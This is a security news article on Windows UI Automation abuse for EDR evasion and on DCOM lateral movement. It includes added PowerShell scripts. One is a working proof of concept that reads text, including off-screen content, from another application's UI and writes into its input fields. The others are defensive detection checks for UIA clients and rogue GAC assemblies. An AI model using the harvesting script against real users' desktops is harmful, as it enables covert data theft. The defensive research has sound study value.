January 22, 2025
New Malware Technique Could Exploit Windows UI Framework to Evade EDR Tools

Dec 11, 2024 | Ravie Lakshmanan | Malware / Endpoint Security

A newly devised technique leverages a Windows accessibility framework called UI Automation (UIA) to perform a wide range of malicious activities without tipping off endpoint detection and response (EDR) solutions.

“To exploit this technique, a user must be convinced to run a program that uses UI Automation,” Akamai security researcher Tomer Peled said in a report shared with The Hacker News. “This can lead to stealthy command execution, which can harvest sensitive data, redirect browsers to phishing websites, and more.”

Even worse, local attackers could take advantage of this security blind spot to execute commands and to read and write messages in messaging applications such as Slack and WhatsApp. It could also potentially be weaponized to manipulate UI elements over a network.

First available on Windows XP as part of the Microsoft .NET Framework, UI Automation provides programmatic access to user interface (UI) elements so that assistive technology products, such as screen readers, can read and manipulate them. It is also widely used for automated UI testing.

“Assistive technology applications typically need access to the protected system UI elements, or to other processes that might be running at a higher privilege level,” Microsoft notes in a support document. “Therefore, assistive technology applications must be trusted by the system, and must run with special privileges.”

“To get access to higher IL processes, an assistive technology application must set the UIAccess flag in the application’s manifest and be launched by a user with administrator privileges.”

Interaction with UI elements in other applications is carried out over the Component Object Model (COM), which UIA uses as its inter-process communication (IPC) mechanism. A client creates UIA objects, interacts with whichever application is currently in focus, and can register an event handler that fires when certain UI changes are detected.

Akamai’s research found that this same mechanism opens an avenue for abuse, allowing malicious actors to read and write messages, steal data entered into websites (e.g., payment information), and execute commands that redirect victims to malicious websites whenever the page currently displayed in a browser refreshes or changes.

“In addition to the UI elements currently shown on the screen that we can interact with, more elements are loaded in advance and placed in a cache,” Peled noted. “We can also interact with those elements, such as reading messages not shown on the screen, or even set the text box and send messages without it being reflected on the screen.”
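The mechanism described above, as an added example and not Akamai’s proof-of-concept code: a Windows PowerShell (5.1) script that uses the .NET UI Automation client to walk the UIA tree of a target process, pull text out of every element that exposes a Value or Text pattern, report which elements UIA exposes but is not currently drawing (the IsOffscreen property, which is how scrolled-away or pre-loaded content surfaces to a client), and write into an editable control without sending keystrokes. The target process name (notepad) and the treatment of IsOffscreen as the marker for "not shown on the screen" are assumptions made for the example.

```powershell
# Added example, not code from the original article or from Akamai.
# Requires Windows PowerShell 5.1 (the UIA client assemblies ship with the .NET Framework).
Add-Type -AssemblyName UIAutomationClient
Add-Type -AssemblyName UIAutomationTypes

$AE = [System.Windows.Automation.AutomationElement]

function Get-UiaWindow {
    param([string]$ProcessName = 'notepad')   # assumption: a visible Notepad window exists
    $proc = Get-Process -Name $ProcessName -ErrorAction Stop |
        Where-Object { $_.MainWindowHandle -ne [IntPtr]::Zero } |
        Select-Object -First 1
    if (-not $proc) { throw "No visible top-level window for process '$ProcessName'" }
    # UIA hands back an element for the other process's window; from here on everything
    # goes over COM, and the target application is never asked for consent.
    return $AE::FromHandle($proc.MainWindowHandle)
}

function Get-UiaTextElements {
    param([string]$ProcessName = 'notepad')
    $win = Get-UiaWindow -ProcessName $ProcessName
    # Every descendant, not just what is painted: elements the provider has already
    # created for content outside the viewport come back too, flagged IsOffscreen = $true.
    $all = $win.FindAll([System.Windows.Automation.TreeScope]::Descendants,
                        [System.Windows.Automation.Condition]::TrueCondition)
    foreach ($el in $all) {
        $pattern = $null
        $text = $null
        if ($el.TryGetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern, [ref]$pattern)) {
            $text = $pattern.Current.Value            # edit boxes, combo boxes, URL bars
        } elseif ($el.TryGetCurrentPattern([System.Windows.Automation.TextPattern]::Pattern, [ref]$pattern)) {
            $text = $pattern.DocumentRange.GetText(-1) # documents, chat panes, rich text
        }
        if ($text) {
            [pscustomobject]@{
                ControlType = $el.Current.ControlType.ProgrammaticName
                Name        = $el.Current.Name
                OffScreen   = $el.Current.IsOffscreen
                Text        = $text
            }
        }
    }
}

function Set-UiaEditValue {
    # Writes text into the first editable control of the window without keystrokes,
    # focus changes or window activation; nothing is typed, so no keylogger-style hook sees it.
    param([string]$ProcessName = 'notepad', [string]$Value)
    $win = Get-UiaWindow -ProcessName $ProcessName
    $cond = New-Object System.Windows.Automation.PropertyCondition(
        $AE::ControlTypeProperty, [System.Windows.Automation.ControlType]::Edit)
    $edit = $win.FindFirst([System.Windows.Automation.TreeScope]::Descendants, $cond)
    if (-not $edit) { return $false }
    $vp = $null
    if ($edit.TryGetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern, [ref]$vp) -and
        -not $vp.Current.IsReadOnly) {
        $vp.SetValue($Value)
        return $true
    }
    return $false
}

# Usage: dump everything UIA can read from Notepad, then overwrite its edit control.
Get-UiaTextElements -ProcessName notepad | Format-Table ControlType, OffScreen, Text -AutoSize
Set-UiaEditValue -ProcessName notepad -Value 'written over COM, not typed'
```

The script runs at the same integrity level as the target (UIA will not reach into higher-IL processes without the UIAccess manifest flag the Microsoft document describes), which is exactly the situation of a user-launched program on the same desktop. UIA event subscriptions (Automation.AddAutomationFocusChangedEventHandler and AddAutomationEventHandler) are the natural next step for the "react when the page changes" behaviour the article describes, but their callbacks arrive on a UIA worker thread, which PowerShell script blocks cannot run on, so that part belongs in a compiled client rather than a script.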

That said, it bears noting that each of these scenarios abuses functionality UI Automation provides by design, much as Android’s accessibility services API has become a staple way for malware to extract information from compromised devices.

“This goes back to the intended purpose of the application: Those permissions levels have to exist in order to use it,” Peled added. “This is why UIA is able to bypass Defender — the application finds nothing out of the ordinary. If something is seen as a feature rather than a bug, the machine’s logic will follow the feature.”
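Because the activity is a legitimate feature, there is no single "bad" API call to alert on; what a defender can do is inventory which processes are acting as UIA clients. The following Windows PowerShell check is an added example, not part of the article or Akamai’s research: it lists running processes that have loaded UIAutomationCore.dll (the native UIA client library that both the managed System.Windows.Automation client and native IUIAutomation consumers end up loading) and flags any whose image is not validly signed by Microsoft. The Microsoft-signer allowlist is an assumption; a real deployment would add its own screen readers, test tools and RPA agents.

```powershell
# Added example, not code from the original article or from Akamai.
function Get-UiaClientProcesses {
    foreach ($p in Get-Process) {
        $mods = $null
        try { $mods = $p.Modules } catch { continue }   # access denied or 32/64-bit mismatch
        if (-not ($mods | Where-Object { $_.ModuleName -ieq 'UIAutomationCore.dll' })) { continue }

        $signer = 'n/a'
        if ($p.Path) {
            $sig = Get-AuthenticodeSignature -FilePath $p.Path
            $signer = if ($sig.Status -eq 'Valid') { $sig.SignerCertificate.Subject } else { "UNSIGNED ($($sig.Status))" }
        }
        [pscustomobject]@{
            Pid        = $p.Id
            Name       = $p.ProcessName
            Path       = $p.Path
            Signer     = $signer
            # Assumption for the example: only Microsoft-signed UIA clients are expected on this host.
            Suspicious = -not ($signer -like '*Microsoft Corporation*')
        }
    }
}

Get-UiaClientProcesses | Where-Object Suspicious | Format-Table Pid, Name, Path, Signer -AutoSize
```

Explorer, browsers and Office load the same DLL for their own accessibility support, so the signature filter is what keeps the list short. The check is a point-in-time snapshot; for continuous coverage, feed the same module-load condition (Sysmon Event ID 7 for UIAutomationCore.dll from an unexpected image) into the EDR instead of polling.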

From COM to DCOM: A Lateral Movement Attack Vector

The disclosure comes as Deep Instinct revealed that the Distributed COM (DCOM) Remote Protocol, which allows software components to communicate over a network, could be exploited to remotely write custom payloads to create an embedded backdoor.

The attack “allows the writing of custom DLLs to a target machine, loading them to a service, and executing their functionality with arbitrary parameters,” security researcher Eliran Nissan said. “This backdoor-like attack abuses the IMsiServer COM interface.”

That said, the Israeli cybersecurity company noted that an attack of this kind leaves clear indicators of compromise (IoCs) that can be detected and blocked. It further requires the attacker and victim machines to be in the same domain.

“Until now, DCOM lateral movement attacks have been exclusively researched on IDispatch-based COM objects due to their scriptable nature,” Nissan said. The new “DCOM Upload & Execute” method “remotely writes custom payloads to the victim’s [Global Assembly Cache], executes them from a service context, and communicates with them, effectively functioning as an embedded backdoor.”

“The research presented here proves that many unexpected DCOM objects may be exploitable for lateral movement, and proper defenses should be aligned.”
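The one artifact the article itself names for this technique is the custom assembly written to the victim’s Global Assembly Cache. As an added example, not Deep Instinct’s tooling or a reproduction of the attack, the following Windows PowerShell check hunts for assemblies recently written under the GAC that do not carry a valid Microsoft signature. The GAC paths (the .NET 4.x cache under Microsoft.NET\assembly and the legacy cache under Windows\assembly on a default install), the seven-day window and the Microsoft-only signer allowlist are assumptions for the example.

```powershell
# Added example, not code from the original article or from Deep Instinct.
function Get-RecentGacAssemblies {
    param([int]$Days = 7)   # assumption: look back one week
    # Assumption: default install locations of the .NET 4.x GAC and the legacy .NET 2.0/3.x GAC.
    $roots = @("$env:windir\Microsoft.NET\assembly", "$env:windir\assembly")
    $since = (Get-Date).AddDays(-$Days)

    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        Get-ChildItem -Path $root -Recurse -Filter *.dll -ErrorAction SilentlyContinue |
            Where-Object { $_.LastWriteTime -ge $since } |
            ForEach-Object {
                $sig = Get-AuthenticodeSignature -FilePath $_.FullName
                $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
                [pscustomobject]@{
                    Path       = $_.FullName
                    Written    = $_.LastWriteTime
                    SigStatus  = $sig.Status
                    Signer     = $subject
                    # A payload dropped by an attacker is either unsigned or signed by someone else.
                    Suspicious = ($sig.Status -ne 'Valid') -or ($subject -notlike '*Microsoft Corporation*')
                }
            }
    }
}

Get-RecentGacAssemblies -Days 7 | Where-Object Suspicious |
    Format-Table Path, Written, SigStatus, Signer -AutoSize
```

LastWriteTime is attacker-controllable, so treat this as a sweep rather than a guarantee: the durable signal is file-creation auditing on those directories (Security Event ID 4663 with an object-access SACL, or Sysmon Event ID 11), correlated with the network logon that preceded the DCOM activation, which the article notes must come from a machine in the same domain.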
